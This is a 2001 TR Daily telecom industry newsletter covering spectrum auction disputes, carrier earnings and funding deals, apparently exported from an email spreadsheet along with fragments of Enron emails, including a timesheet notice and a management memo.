http://www.tr.com/online/trd/2001/td102601/index.htm_x000D_
_x000D_
U.S. REACHES SETTLEMENT WITH NextWave;_x000D_
McCain WARNS AGAINST `SHORTCHANGING' TAXPAYERS_x000D_
http://www.tr.com/online/trd/2001/td102601/Td102601.htm_x000D_
_x000D_
BUSH ADMINISTRATION SAYS IT OPPOSES_x000D_
NORTHPOINT'S EFFORTS TO AVOID AUCTIONS_x000D_
http://www.tr.com/online/trd/2001/td102601/Td102601-01.htm_x000D_
_x000D_
COMMISSIONERS:  BROADBAND DEPLOYMENT SUFFERS_x000D_
FROM UNCERTAINTY, SLOW REGULATORY PROCESSES_x000D_
http://www.tr.com/online/trd/2001/td102601/Td102601-02.htm_x000D_
_x000D_
ERICSSON FOCUSES ON COST-CUTTING_x000D_
AS MOBILE GEAR MARKET RECEDES_x000D_
http://www.tr.com/online/trd/2001/td102601/Td102601-03.htm_x000D_
_x000D_
JDS UNIPHASE SEES DEMAND FALLING FURTHER,_x000D_
AFTER FIRST QUARTER SALES DROPPED 45%_x000D_
http://www.tr.com/online/trd/2001/td102601/Td102601-04.htm_x000D_
_x000D_
MOODY's DOWNGRADES AT&amp;T's DEBT RATINGS_x000D_
http://www.tr.com/online/trd/2001/td102601/Td102601-05.htm_x000D_
_x000D_
TELECOM EARNINGS ROUNDUP=20_x000D_
http://www.tr.com/online/trd/2001/td102601/Td102601-06.htm_x000D_
_x000D_
TELECOM SECTOR WEEKLY FUNDING ROUNDUP_x000D_
http://www.tr.com/online/trd/2001/td102601/Td102601-07.htm_x000D_
_x000D_
NEWS IN BRIEF=20_x000D_
http://www.tr.com/online/trd/2001/td102601/Td102601-08.htm_x000D_
_x000D_
_x000D_
****************************************************************_x000D_
U.S. REACHES SETTLEMENT WITH NextWave;_x000D_
McCain WARNS AGAINST `SHORTCHANGING' TAXPAYERS_x000D_
_x000D_
A settlement to resolve the dispute over NextWave Telecom, Inc.'s_x000D_
"C" and "F" block PCS (personal communications service) licenses is_x000D_
complete, sources told TRDaily today.  Over the weekend, FCC_x000D_
staffers intend to brief key congressional aides on the accord with_x000D_
an eye toward having everyone on board for an announcement early_x000D_
next week, sources said._x000D_
_x000D_
But a top senator today raised concerns that a settlement with_x000D_
NextWave could "shortchange" U.S. taxpayers.  "What troubles me is_x000D_
that spectrum auction revenues are being lost just when they are_x000D_
most needed," said Sen. John McCain (R., Ariz.), the ranking member_x000D_
on the Senate Commerce, Science, and Transportation Committee, in_x000D_
a letter to Senate Majority Leader Thomas A. Daschle (D., S.D.) and_x000D_
Minority Leader Trent Lott (R., Miss.)._x000D_
_x000D_
Sen. McCain noted the numerous demands on the U.S. budget due to_x000D_
the Sept. 11 terrorist attacks, including funding the war,_x000D_
rebuilding damaged infrastructure, and propping up weakened_x000D_
industries._x000D_
_x000D_
"Since revenues are essential to each of these vital tasks, I_x000D_
believe that the government can no longer afford to simply `pay_x000D_
off' a company whose only contribution to the American economy has_x000D_
been to manipulate, for private gain, the results of an improperly_x000D_
designed auction of a valuable public good," Sen. McCain added._x000D_
_x000D_
Sen. McCain noted NextWave reportedly would walk away with $5_x000D_
billion in a settlement, and the U.S. Treasury would get about $11_x000D_
billion.  By contrast, the government would have received $15.85_x000D_
billion for NextWave's spectrum if an appeals court hadn't ruled_x000D_
that the FCC illegally reclaimed the carrier's licenses.  A_x000D_
reauction earlier this year of NextWave's licenses netted a total_x000D_
of $16.8 billion, including licenses that didn't belong to_x000D_
NextWave._x000D_
_x000D_
The senator also noted that Verizon Wireless reportedly had asked_x000D_
to delay until May 2002 paying the balance of what it would owe on_x000D_
the licenses it bid on at the reauction._x000D_
_x000D_
"What assurances will the American taxpayer have that the federal_x000D_
government will receive the billions owed to them from the January_x000D_
reauction?" Sen. McCain asked.  "The taxpayers of this country_x000D_
deserve an agreement that properly ensures that settlement funds_x000D_
are paid in full before the American taxpayer is asked to_x000D_
participate in any settlement._x000D_
_x000D_
"The expected $17 billion. . .in receipts from January's reauction_x000D_
would have provided revenue desperately needed to address the_x000D_
recent terrorist attacks upon this country, and I am disturbed that_x000D_
an American company would force American taxpayers to forgo some of_x000D_
that money by exploiting legal technicalities," he added.  "But if_x000D_
this does happen, then this Congress must use its oversight_x000D_
authority to ensure that this matter is resolved upon terms that_x000D_
protect the American people from being shortchanged once again."_x000D_
_x000D_
Lawmakers' endorsement of any NextWave settlement is crucial;_x000D_
Congress would be asked to approve legislation that would codify_x000D_
the accord, sources said._x000D_
_x000D_
-- Paul Kirby, pkirby@tr.com_x000D_
_x000D_
_x000D_
****************************************************************_x000D_
BUSH ADMINISTRATION SAYS IT OPPOSES_x000D_
NORTHPOINT'S EFFORTS TO AVOID AUCTIONS_x000D_
_x000D_
Northpoint Technology, Inc.'s attempt to gain access to Ku-band_x000D_
spectrum for free has suffered a major setback.  The Bush_x000D_
administration has weighed in against the company, saying it_x000D_
opposes any efforts to restrict the FCC's ability to assign_x000D_
terrestrial licenses by competitive bidding._x000D_
_x000D_
The development represents a victory for the direct broadcast_x000D_
satellite (DBS) and terrestrial wireless industries, which have_x000D_
fought Northpoint on the issue._x000D_
_x000D_
Sources have said that Northpoint was attempting to get senators to_x000D_
tack a "rider" onto a fiscal year 2002 appropriations bill that_x000D_
would prohibit the FCC from auctioning spectrum to terrestrial_x000D_
wireless providers if those frequencies were licensed to satellite_x000D_
services without such competitive bidding (TR, Oct 22)._x000D_
_x000D_
The FCC last year said that terrestrial wireless systems can share_x000D_
the Ku-band with DBS providers and it is now considering technical_x000D_
and service rules for licensing Northpoint, including whether to_x000D_
auction the spectrum (TR, Dec. 4, 2000)._x000D_
_x000D_
In an Oct. 25 statement regarding the Senate agriculture_x000D_
appropriations bill, the White House's Office of Management and_x000D_
Budget said the Bush administration "would strongly oppose any_x000D_
amendment that would restrict the FCC's ability to assign, via_x000D_
competitive bidding, spectrum licenses that could be used by_x000D_
terrestrial (i.e., non-satellite) services._x000D_
_x000D_
"Such a provision would interfere with the efficient allocation of_x000D_
federal spectrum licenses, provide a windfall to certain users, and_x000D_
reduce federal revenues," OMB added._x000D_
_x000D_
The Satellite Broadcasting and Communications Association, which_x000D_
represents DBS providers, praised the Bush administration's_x000D_
position.  "There is no public policy or legal justification for_x000D_
Congress to accept Northpoint's outrageous proposal to change_x000D_
current law and give Northpoint the use of this spectrum for free,"_x000D_
said Andy Wright, SBCA's acting president._x000D_
_x000D_
But Antoinette Cook Bush, Northpoint's executive vice president,_x000D_
responded, "It is very hypocritical for SBCA to urge auctions for_x000D_
our company, when its members such as Hughes [Electronics Corp.]_x000D_
successfully urged Congress to enact legislation last year to_x000D_
exempt themselves from auctions while their applications were_x000D_
pending to share spectrum with Northpoint."_x000D_
_x000D_
She added that Northpoint "only seeks fair and equal treatment with_x000D_
other companies seeking to use the same spectrum. . .The existing_x000D_
statutory exemption plainly gives satellites an enormous_x000D_
competitive advantage over us and we're simply asking the Congress_x000D_
and the administration to restore a technologically neutral_x000D_
regulatory process."_x000D_
_x000D_
-- Paul Kirby, pkirby@tr.com_x000D_
_x000D_
_x000D_
****************************************************************_x000D_
COMMISSIONERS:  BROADBAND DEPLOYMENT SUFFERS_x000D_
FROM UNCERTAINTY, SLOW REGULATORY PROCESSES_x000D_
_x000D_
FCC Commissioners today disputed that there's a "broadband crisis"_x000D_
in the U.S.  Broadband deployment is occurring "on a reasonable and_x000D_
timely basis" compared with the pace of earlier technologies, Com-_x000D_
missioner Kathleen Q. Abernathy said._x000D_
_x000D_
She and Commissioners Michael J. Copps and Kevin J. Martin shared_x000D_
their ideas for spurring the deployment of advanced services today_x000D_
at a national broadband summit in Arlington, Va.  Sponsors of the_x000D_
summit included the National Association of Regulatory Utility_x000D_
Commissioners and the National Exchange Carrier Association, Inc._x000D_
_x000D_
Commissioner Copps called broadband a "precious right" for all_x000D_
Americans but said it was "too early to say we have a `broadband_x000D_
divide.'"  Commissioner Martin said the country should focus on_x000D_
broadband as a "fundamental national priority."_x000D_
_x000D_
"We need to change the way government taxes broadband services and_x000D_
[creates] regulatory financial disincentives," he said.  He_x000D_
specifically singled out state and local government burdens such as_x000D_
franchise fees, right-of-way fees, and permitting processes._x000D_
_x000D_
"We need more strict enforcement of the collocation rules,_x000D_
additional performance measures [on unbundled network elements],_x000D_
and the FCC should reconsider which elements should be made_x000D_
available," he said.  Regulators also need to remove the_x000D_
"regulatory underbrush" of federal, state, and local rules, he_x000D_
said._x000D_
_x000D_
The FCC should move expeditiously on the cable open access pro-_x000D_
ceeding and perhaps create a "rocket docket" to resolve complaints_x000D_
filed with the Enforcement Bureau, he said.  According to one_x000D_
source, there are thousands of pending Internet service provider_x000D_
complaints._x000D_
_x000D_
Commissioner Abernathy said the FCC should look at what it could do_x000D_
to encourage investment in telecom facilities.  "We need to look at_x000D_
the decision and rulemaking processes and address issues sooner,"_x000D_
she said.  "We are behind the curve on technology advances."_x000D_
_x000D_
Mr. Copps said the current pessimism regarding broadband deployment_x000D_
was misguided.  Broadband can revitalize the economy, he said.  But_x000D_
the FCC "gets in trouble when it doesn't look at the supply-and-de-_x000D_
mand issues for a service and sets policies to encourage certain_x000D_
services."  He cited third-generation wireless services and digital_x000D_
TV as examples where expectations hadn't been met._x000D_
_x000D_
"The train can't carry freight until the tracks are laid," he said.=20_x000D_
The FCC's role is to eliminate barriers, regulate with clarity and_x000D_
transparency, and speed decision making, he added._x000D_
_x000D_
-- Ed Rovetto, erovetto@tr.com_x000D_
_x000D_
_x000D_
****************************************************************_x000D_
ERICSSON FOCUSES ON COST-CUTTING_x000D_
AS MOBILE GEAR MARKET RECEDES_x000D_
_x000D_
As its customers pause to consider how and when to deploy third-_x000D_
generation (3G) wireless services, Telefon AB LM Ericsson is_x000D_
counting on deeper cost-cutting to combat slower sales.  The_x000D_
"efficiency program," as the cost-reduction effort is known, "is_x000D_
ahead of schedule," President and Chief Executive Officer Kurt_x000D_
Hellstrom said today._x000D_
_x000D_
The company cut 2.5 billion Swedish kronor ($236 million) in the_x000D_
quarter that ended Sept. 30 and will save 7 billion kronor ($660.7_x000D_
million) by year-end, he said.  It reduced headcount by 5,500_x000D_
employees during the quarter, bringing its headcount cuts to 6,800_x000D_
so far this year._x000D_
_x000D_
The Swedish telecom equipment maker lent more weight to its cost-_x000D_
cutting prospects by announcing that Michael Treschow would become_x000D_
chairman, effective March 2002.  He will resign as president and_x000D_
CEO of Electrolux and will succeed Lars Ramqvist as Ericsson's_x000D_
chairman._x000D_
_x000D_
Mr. Treschow "is known for his effective cost-cutting management_x000D_
skills at Electrolux and Atlas Copco and we believe he is just what_x000D_
Ericsson needs in this difficult operating environment," said_x000D_
Adnaan Ahmad of Merrill Lynch &amp; Co._x000D_
_x000D_
Ericsson's third quarter results fell short of expectations.  The_x000D_
company recorded sales of 54.6 billion kronor ($5.2 billion), a 19%_x000D_
drop from a year ago.  Net losses totaled 4 billion kronor ($377.5_x000D_
million) versus a net gain of 4.4 billion kronor ($415.3 million)_x000D_
a year ago._x000D_
_x000D_
The outlook for the rest of this year and 2002 isn't particularly_x000D_
bright.  The company revised its prediction that sales for the_x000D_
entire mobile systems industry would remain flat or show modest_x000D_
growth next year.  It now expects the market to be down as much as_x000D_
10%.  Its own sales will track that industry trend, it said._x000D_
_x000D_
The company's third quarter results were "weaker than_x000D_
expectations," and its fourth quarter guidance was "disappointing,"_x000D_
said Jeffrey Schlesinger of UBS Warburg LLC.  Moody's Investors_x000D_
Service, meanwhile, downgraded the company's long-term debt rating_x000D_
to "Baa-1" from "A-3."_x000D_
_x000D_
"There are still no signs of a recovery in the demand for mobile_x000D_
phone equipment," Moody's said.  "On the contrary, Moody's expects_x000D_
more carriers to defer upgrades to the GPRS [general packet radio_x000D_
service] standard, to postpone installations of 3G networks, or to_x000D_
agree with partners on network sharing."_x000D_
_x000D_
"The rating downgrade is based on Ericsson's increasing reliance on_x000D_
wireless infrastructure equipment and on the anticipated further_x000D_
slowdown and heightened price competition in this segment as_x000D_
wireless operators are very carefully considering their complicated_x000D_
technology migration strategies," Moody's said._x000D_
_x000D_
-- Tom Leithauser, tleithauser@tr.com_x000D_
_x000D_
_x000D_
****************************************************************_x000D_
JDS UNIPHASE SEES DEMAND FALLING FURTHER,_x000D_
AFTER FIRST QUARTER SALES DROPPED 45%_x000D_
_x000D_
JDS Uniphase Corp., a bellwether in the optical networking_x000D_
equipment sector, late Thursday said it still couldn't see the bot-_x000D_
tom of the demand slump that sequentially trimmed its revenues by_x000D_
nearly half in the firm's fiscal first quarter ending Sept. 29._x000D_
_x000D_
JDS's revenues in the quarter fell to $329 million, 45% below the_x000D_
$601 million reported for the fourth quarter of fiscal 2001 ending_x000D_
June 30.  During the first quarter of fiscal 2000, JDS racked up_x000D_
$786 million of revenues.  The latest quarter was accompanied by a=20_x000D_
$260 million net loss excluding some downsizing and other charges_x000D_
versus a $177 million profit in the year-ago quarter._x000D_
_x000D_
"Our industry continues to be affected by declining carrier capital_x000D_
spending and a weak overall economic environment," commented Jozef_x000D_
Straus, co-chairman, president, and chief executive officer.   In_x000D_
the short term at least, JDS executives expect neither of those_x000D_
trends to abate._x000D_
_x000D_
"The company anticipates sales for the second quarter will be_x000D_
approximately 10%-15% below the first quarter as the downturn in_x000D_
the company's markets continues," JDS said in its earnings release_x000D_
late yesterday.  Excluding charges related to cost-cutting_x000D_
measures, JDS expects to report a small net loss for the second_x000D_
quarter.  The firm declined to offer any financial performance_x000D_
guidance beyond then._x000D_
_x000D_
In the meantime, JDS said it would continue to reduce expenses_x000D_
while funding development of new products.  "We believe these next-_x000D_
generation systems will be part of a future industry recovery and_x000D_
that we are well positioned to help our company and our customers_x000D_
return to growth," the firm said._x000D_
_x000D_
JDS's cost-cutting measures thus far have produced $600 million of_x000D_
annual savings, with another $200 million of savings targeted.=20_x000D_
Included in the downsizing have been substantial layoffs and_x000D_
closure of 17 manufacturing facilities.  The cuts in operating_x000D_
expenses have not come cheaply.  Through the end of September, JDS_x000D_
took $778 million of charges related to cost saving efforts.  It_x000D_
expects up to $172 million in additional charges to complete the_x000D_
program._x000D_
_x000D_
-- John Curran, jcurran@tr.com_x000D_
_x000D_
_x000D_
****************************************************************_x000D_
MOODY's DOWNGRADES AT&amp;T's DEBT RATINGS_x000D_
_x000D_
Moody's Investors Service reduced AT&amp;T Corp.'s debt ratings and_x000D_
said it might issue further downgrades.  The core telephony unit_x000D_
was downgraded to "A-3" from "A-2" and the less creditworthy_x000D_
broadband cable TV division was lowered to "Baa-1" from "A-3."  The_x000D_
ratings on AT&amp;T's short-term debt were lowered from "prime-1," the_x000D_
highest rating on such debt, to "prime-2."_x000D_
_x000D_
Moody's new ratings on AT&amp;T are roughly equivalent to those of_x000D_
another big rating agency, Fitch.  But they are one notch below_x000D_
where Standard &amp; Poor's rates the company.  AT&amp;T's ratings are_x000D_
under review at S&amp;P and might be lowered in the near future.  The_x000D_
downgrades can add to AT&amp;T's cost of raising funds in the debt_x000D_
market, but AT&amp;T's debt securities still are considered "investment_x000D_
grade."_x000D_
_x000D_
Moody's said its downgrade reflected "the deterioration in the_x000D_
prospective performance of the company's telephony operations and_x000D_
concerns that debt reduction efforts from the sale or monetization_x000D_
of noncore assets are likely to fall short of previous_x000D_
expectations."_x000D_
_x000D_
"Moody's expects profitability to decline over the intermediate_x000D_
term as [Bell companies] are permitted to enter the long distance_x000D_
business in more and more states," the rating agency said.  "There_x000D_
is not, at this time, a clear-cut growth area to offset this_x000D_
decline."_x000D_
_x000D_
Bear, Stearns &amp; Co. debt-market analyst Marion Boucher Soper said_x000D_
"the downgrade should not come as a surprise given that [AT&amp;T's]_x000D_
ratings have been under review for downgrade since the announcement_x000D_
of its restructuring" a year ago._x000D_
_x000D_
-- Tom Leithauser, tleithauser@tr.com_x000D_
_x000D_
_x000D_
****************************************************************_x000D_
TELECOM EARNINGS ROUNDUP=20_x000D_
_x000D_
CommScope, Inc., a maker of broadband and other communications_x000D_
cables, said revenues for the third quarter fell to $177.7 million_x000D_
from $256.9 million in the comparable quarter last year.  Net_x000D_
income fell to $6.3 million for the most recent quarter compared_x000D_
with $22.9 million last year._x000D_
_x000D_
Alaska Communications Systems Group grew third quarter revenues to_x000D_
$82.8 million versus $74.9 million in the year-ago quarter.  EBITDA_x000D_
(earnings before interest, taxes, depreciation, and amortization)_x000D_
grew to $33.3 million in the latest quarter compared to $23.3_x000D_
million last year, while the firm's net loss narrowed to $1.3_x000D_
million from $10.8 million._x000D_
_x000D_
Symmetricom, Inc., a telecom network software provider, posted net_x000D_
sales of $18.5 million for its fiscal first quarter ended Sept. 30_x000D_
and a net loss of $1.1 million.  In the comparable quarter last_x000D_
year, the company reported revenues of $36.0 million and a $5.5_x000D_
million profit.=20_x000D_
_x000D_
GSI Lumonics, Inc., booked third quarter sales of $41.3 million,_x000D_
down from $76.5 million in the second quarter of the year and $97.6_x000D_
million in the third quarter of 2000.  GSI, whose product line_x000D_
includes precision optics for telecom networks, suffered a net loss_x000D_
of $8.5 million in the most recent quarter versus a $7.2 million_x000D_
profit in the year-ago quarter.=20_x000D_
_x000D_
P-Com, Inc., a provider of wireless access services for telecom_x000D_
markets, said third quarter sales plummeted to $10.3 million from_x000D_
$61.0 million in the year-ago quarter.  Net loss for the most_x000D_
recent quarter amounted to $37.3 million versus a loss of $0.9_x000D_
million in the comparable quarter last year.=20_x000D_
_x000D_
Corvis Corp., which makes optical networking software, posted third_x000D_
quarter revenues of $24.1 million and a net loss of $80.6 million.=20_x000D_
During the comparable period last year, Corvis generated $22.9_x000D_
million in revenue with a net loss of $66.3 million.=20_x000D_
_x000D_
_x000D_
****************************************************************_x000D_
TELECOM SECTOR WEEKLY FUNDING ROUNDUP_x000D_
_x000D_
Following are highlights from this week's telecom sector corporate_x000D_
financing deals, with recipients listed in alphabetical order:_x000D_
_x000D_
2Wire, Inc., secured an additional $61 million of venture capital_x000D_
financing from funders including Technology Crossover Ventures and_x000D_
Oak Investment Partners.  2Wire is a provider of broadband delivery_x000D_
through residential gateways._x000D_
_x000D_
Avaya, Inc., sold $400 million of zero-coupon convertible bonds,_x000D_
market sources confirmed.  The communications equipment maker has_x000D_
slated proceeds from the offering to reduce short-term debt._x000D_
_x000D_
Bell Canada announced an offering of $200 million Canadian (US$127_x000D_
million) of medium-term debentures due 2031._x000D_
_x000D_
BellSouth Corp. sold $2.75 billion of notes with maturity dates_x000D_
ranging from 2006 to 2031._x000D_
_x000D_
CENiX, Inc., a maker of optical communications equipment, raised_x000D_
$52 million in equity and debt financing from funders including_x000D_
Posdata Co. and AK Investments._x000D_
_x000D_
Citizens Communications Co. completed a new $1 billion financing_x000D_
agreement, including an $800 million revolving credit facility and_x000D_
a $200 million term loan.  The new facilities replace Citizens's_x000D_
previous standby credit facility.=20_x000D_
_x000D_
Fairchild Semiconductor International arranged a private sale of_x000D_
$200 million of convertible senior subordinated notes due 2008.=20_x000D_
The notes will be convertible into Fairchild common stock at $30_x000D_
per share.  Proceeds from the offering may be used to buy back_x000D_
outstanding debt and fund acquisitions, Fairchild said.  The_x000D_
offering is expected to close by Oct. 31._x000D_
_x000D_
Global Locate, Inc., closed on $12 million of venture capital_x000D_
financing from funders including Firsthand Capital Management and_x000D_
GC Investments LLC.  Based in San Jose, Calif., Global Locate pro-_x000D_
vides Global Positioning System technology for wireless devices._x000D_
_x000D_
Inktomi Corp. announced plans for a public offering of 12.5 million_x000D_
shares of common stock, with an option to sell another 1.8 million_x000D_
shares.  The network software maker said it would use proceeds for_x000D_
general corporate purposes._x000D_
_x000D_
IntelliSpace, a provider of Ethernet broadband services, closed on_x000D_
$10 million of additional venture financing with funders including_x000D_
Halpern Denny &amp; Co._x000D_
_x000D_
L-3 Communications completed the sale of $350 million of senior_x000D_
subordinated convertible contingent debt securities due 2011.  The_x000D_
securities are convertible into common stock at $107.62 per share._x000D_
Proceeds from the offering are slated for acquisitions, among other_x000D_
uses._x000D_
_x000D_
Level 3 Communications, Inc., closed on bond buyback offerings that_x000D_
resulted in the repurchase of $1.7 billion of outstanding bonds in_x000D_
exchange for $720 million in cash.=20_x000D_
_x000D_
Loral Space &amp; Communications Ltd. said its Loral CyberStar unit_x000D_
would launch an exchange offer for up to $927 million of outstand-_x000D_
ing bonds, offering to swap them for $675 million of new Loral_x000D_
CyberStar bonds and warrants to buy 6.7 million shares of Loral_x000D_
common stock.  The new notes to be issued in the exchange offer are_x000D_
guaranteed by Loral, which is not the case with the bonds now_x000D_
outstanding._x000D_
_x000D_
Lytek Corp., a maker of optical communications equipment, secured_x000D_
$3.8 million of venture financing from funders including Wasatch_x000D_
Venture Fund and Intel Capital.=20_x000D_
_x000D_
Motorola, Inc., raised $1.6 billion through the sale of $1.05_x000D_
billion of convertible preferred securities and $600 million of_x000D_
bonds, market sources confirmed.  Motorola has said proceeds from_x000D_
the offering will be used to reduce short-term debt.=20_x000D_
_x000D_
Q Comm International, a prepaid wireless technology concern, signed_x000D_
an agreement to sell 11.4 million shares of its common stock to_x000D_
American Payment Systems, Inc., for $5.7 million.  American Payment_x000D_
will also extend $600,000 of loans to Q Comm and up to $1 million_x000D_
of equipment lease financing._x000D_
_x000D_
Quintessant Communications, Inc., a maker of telecom interconnec-_x000D_
tion software, secured an increase to $7 million in its working_x000D_
capital credit facilities with Silicon Valley Bank._x000D_
_x000D_
RCN Corp. completed the repurchase of $593 million of outstanding_x000D_
bonds in exchange for $161 million in cash._x000D_
_x000D_
Telesat Canada filed with Canadian regulators for a proposed_x000D_
offering of up to $100 million Canadian (US$63.5 million) of senior_x000D_
unsecured notes.  Proceeds will be used for capital expenditures_x000D_
and debt reduction, among other uses.=20_x000D_
_x000D_
TELUS Corp. said it received $147 million of cash proceeds from the_x000D_
sale of its equipment leasing business.  The transaction closed_x000D_
earlier this month._x000D_
_x000D_
Teradyne, Inc., a maker of communications test equipment, completed_x000D_
an offering of $400 million of convertible senior notes due 2006.=20_x000D_
The notes are convertible into common stock at $26 per share._x000D_
_x000D_
XEMICS SA, which makes semiconductors for short-range wireless_x000D_
connectivity, secured $6 million of venture capital financing from_x000D_
funders including TAT Investments and Banexi Ventures._x000D_
_x000D_
_x000D_
****************************************************************_x000D_
NEWS IN BRIEF_x000D_
_x000D_
G. William Ruhl has been named chief executive officer of D&amp;E_x000D_
Communications, Inc., a local exchange carrier based in Ephrata,_x000D_
Penn.  He was senior vice president.  He succeeds Anne B. Sweigart,_x000D_
who will remain chairman and president.  Robert M. Lauman was named_x000D_
vice chairman and senior executive VP.  He was EVP and chief_x000D_
operating officer...._x000D_
_x000D_
Luigi Gasparollo has been named vice president-European operations_x000D_
for QUALCOMM, Inc.  He was managing director of Elsacom, a Dutch_x000D_
international telecom carrier...._x000D_
_x000D_
Earthlink, Inc., has added Robert M. Metcalfe, a venture partner at_x000D_
Polaris Venture Partners, and Marce Fuller, chief executive officer_x000D_
of power and natural gas marketer Mirant, Inc., to its board.=20_x000D_
Philip W. Schiller, vice president-worldwide marketing at Apple_x000D_
Computer, has resigned from the board...._x000D_
_x000D_
President Bush today signed antiterrorism legislation that gives_x000D_
law enforcement officials sweeping new wiretap and electronic_x000D_
surveillance authority.  The House voted 357-66 Oct. 24 in favor of_x000D_
the legislation (HR 3162), while the Senate passed it 98-1_x000D_
yesterday.  Under a provision inserted by the House, the wiretap_x000D_
and electronic surveillance portions of the legislation expire at_x000D_
the end of 2005 unless renewed by Congress...._x000D_
_x000D_
The federal government's process for allocating spectrum is_x000D_
inefficient, with too many frequencies reserved for low-value uses_x000D_
and too few dedicated to high-value purposes, according to an_x000D_
analysis funded by the wireless industry.  "The bottom line is that_x000D_
inefficient spectrum allocation imposes costs on the economy by_x000D_
discouraging innovation, raising costs to consumers, and otherwise_x000D_
reducing the benefits that consumers and businesses would have_x000D_
obtained from new wireless technologies," said the analysis, which_x000D_
was commissioned by the Cellular Telecommunications &amp; Internet_x000D_
Association and prepared by Sebago Associates, Inc., an economic_x000D_
policy consulting firm.  More spectrum should be allocated for_x000D_
commercial wireless services, and the FCC should permit licensees_x000D_
to trade spectrum in secondary markets, the analysis said.  Among_x000D_
the authors of the study was Martin N. Baily, a senior fellow at_x000D_
the Institute for International Economics in Washington and former_x000D_
chairman of the Council of Economic Advisers...._x000D_
_x000D_
CommScope, Inc., a maker of broadband communication cables, is in_x000D_
talks with Furukawa Electric Co. Ltd. of Japan to restructure a_x000D_
venture formed between the firms to acquire an interest in the_x000D_
fiber-optic cable business of Lucent Technologies, Inc.  CommScope_x000D_
said it planned to reduce its investment and participation in the_x000D_
venture.  In announcing the move, CommScope cited "the uncertain_x000D_
economic environment and severe downturn in the telecommunications_x000D_
market as well as associated difficulties in the financing markets_x000D_
following the Sept. 11 tragedy"..._x000D_
_x000D_
Focal Communications Corp. closed on its $430 million recapital-_x000D_
ization transaction that included a $150 million equity infusion_x000D_
and a debt-for-equity swap that cut Focal's junk bond debt load by_x000D_
$295 million.  Focal said it expected to have sufficient funding_x000D_
until it becomes free cash flow positive during the second half of_x000D_
2003...._x000D_
_x000D_
Crown Castle International said Italian regulators had declined to_x000D_
authorize Crown Castle's purchase of a 49% stake in RaiWay SpA.=20_x000D_
Crown Castle last April had contracted to buy the RaiWay stake and_x000D_
had put $380 million in escrow pending government approval...._x000D_
_x000D_
Netia Holdings SA, a Polish alternative telecom service provider,_x000D_
said it would cut employee headcount by an additional 10% on top of_x000D_
an earlier 10% workforce reduction in March...._x000D_
_x000D_
Broadwing Communications signed a multiyear agreement with_x000D_
Allegiance Telecom, Inc., to provide 2.5 gigabit lightwave services_x000D_
that will connect eight of Allegiance's major metropolitan markets.=20_x000D_
Terms of the agreement were not disclosed...._x000D_
_x000D_
AES Corp. extended its unsolicited tender offers for Compania_x000D_
Anonima Nacional Telefonos de Venezuela (CANTV) to Nov. 23.  As_x000D_
reported, CANTV is resisting the offers and has approved payment of_x000D_
special stock dividends, as well as share buybacks, in an attempt_x000D_
to thwart the AES bids...._x000D_
_x000D_
Applied Materials, Inc., has created a venture capital fund,_x000D_
Applied Materials Ventures I L.P., to invest in start-up firms in_x000D_
the optical communications components sector....=20_x000D_
_x000D_
360networks announced that four additional operating subsidiaries_x000D_
in Canada and England have filed for bankruptcy protection.  The_x000D_
parent company sought bankruptcy protection in June in the Supreme_x000D_
Court of British Columbia, while U.S. units filed in U.S._x000D_
Bankruptcy Court for the Southern District of New York...._x000D_
_x000D_
P-Com, Inc., a maker of wireless access systems, announced a_x000D_
preliminary agreement to settle outstanding securities class action_x000D_
litigation in the Santa Clara County, Calif., Superior Court.=20_x000D_
Terms of the proposed settlement were not spelled out, but P-Com_x000D_
said the deal would be funded entirely from the firm's liability_x000D_
insurance...._x000D_
_x000D_
HearMe, a developer of Internet telephony technologies, said its_x000D_
shareholders had approved a resolution to liquidate the company's_x000D_
assets and distribute any remaining capital to shareholders._x000D_
_x000D_
_x000D_
********************************************************_x000D_
TR DAILY Copyright 2001 Telecommunications Reports International,_x000D_
Inc., (ISSN 1082-9350) is transmitted weekdays, except for_x000D_
holidays.  Visit us on the World Wide Web at http://www.tr.com.=20_x000D_
Published by the Business &amp; Finance Group of CCH INCORPORATED._x000D_
_x000D_
Editor: John Curran_x000D_
Associate Editor: Tom Leithauser_x000D_
Associate Editor: Ryan Oremland_x000D_
Associate Editor: Ed Rovetto_x000D_
Publisher: Stephen P. Munro_x000D_
1333 H Street, NW, 1st Floor-East Tower, Washington, DC 20005_x000D_
Editorial Information: Telephone:  (202) 312-6060_x000D_
                       Fax:  (202) 312-6111_x000D_
                       Email: jcurran@tr.com_x000D_
                              tleithauser@tr.com_x000D_
_x000D_
Customer Service:      Telephone:  (202) 312-6050_x000D_
                                   (877) 874-8737_x000D_
                       Fax:  (202) 312-6116_x000D_
                       Email: customerservice@tr.com_x000D_
_x000D_
Federal copyright law prohibits duplication or reproduction in_x000D_
any form, including electronic, without permission of the_x000D_
publisher.=1A</t>
  </si>
  <si>
    <t>Tue, 23 Oct 2001 11:50:04 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'grinotice@itiliti.com'})</t>
  </si>
  <si>
    <t>RE: GRI  Msg: Time Sheet Submitted for JEANETTE Y . DOLL.</t>
  </si>
  <si>
    <t xml:space="preserve">What is my user id and password_x000D_
_x000D_
-----Original Message-----_x000D_
From: itiliti GRI Notification [mailto:GRINotice@itiliti.com]_x000D_
Sent: Tuesday, October 23, 2001 1:43 PM_x000D_
To: Geaccone, Tracy_x000D_
Subject: GRI Msg: Time Sheet Submitted for JEANETTE Y . DOLL._x000D_
_x000D_
_x000D_
A time sheet for JEANETTE Y . DOLL has been submitted for your approval._x000D_
_x000D_
Candidate Name: JEANETTE Y . DOLL _x000D_
Client Name: Enron-eHouston _x000D_
Time Sheet Status: Submitted _x000D_
Time Entry Start Date: 10/15/2001 _x000D_
Time Entry End Date: 10/21/2001 _x000D_
Submitted By: JEANETTE Y . DOLL _x000D_
Approved/Rejected By: _x000D_
_x000D_
Click link to access timesheet:  https://gri.itiliti.com/TimeApproval/ViewAprvTSAmdt.asp?ResUsrId=27631&amp;ClntOrgId=661&amp;auth=apvl&amp;PrsnId=20599&amp;PrsnTpCd=2&amp;Strt_Dt=10/15/2001 _x000D_
_x000D_
Message T100 (NQ:390440 ) :   1585 </t>
  </si>
  <si>
    <t>Tue, 25 Jan 2000 22:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Enron is off to a fantastic start this year as we continue strong growth in=_x000D_
=20_x000D_
our wholesale energy businesses and begin rapidly developing a global marke=_x000D_
t=20_x000D_
for premium broadband services.  To help accomplish our goals in these=20_x000D_
businesses, the following management appointments are effective immediately=_x000D_
:_x000D_
_x000D_
Kevin P. Hannon has been appointed chairman and CEO of Enron Global Risk=20_x000D_
